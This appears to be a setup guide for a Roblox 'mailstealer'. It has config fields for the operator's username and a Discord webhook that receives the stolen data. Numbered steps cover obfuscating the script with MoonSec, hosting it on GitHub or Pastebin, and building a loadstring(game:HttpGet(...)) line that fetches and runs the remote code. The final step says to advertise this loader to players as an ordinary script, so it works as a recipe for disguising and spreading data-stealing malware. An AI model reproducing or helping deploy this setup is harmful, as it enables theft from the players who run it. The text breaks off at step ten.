Username = "Your Nick Here"
LoadScreen = true
Webhook = "Your Link Here" -- Paste your Discord webhook here
1: Edit mailstealer with your Username.
2: Save your stealer and Obfuscate it using MoonSec bot OR
3: After u obfuscated save it and register/login on to upload your script.
4: Create a repositorie and upload your obfuscated script (on github or pastebin).
5.1:Click This (Github)
5.2:Click This (Pastebin)
6:And Click The Raw
7: Copy link
8: Put your link in this script
loadstring(game:HttpGet("YOUR LINK HERE", true))()
9: After u finished u got your loadstring script with mailstealer Now all u have to do is adversite this script as u can
loadstring(game:HttpGet("Your Link Here", true))()
10: Create a Webhook Discord !(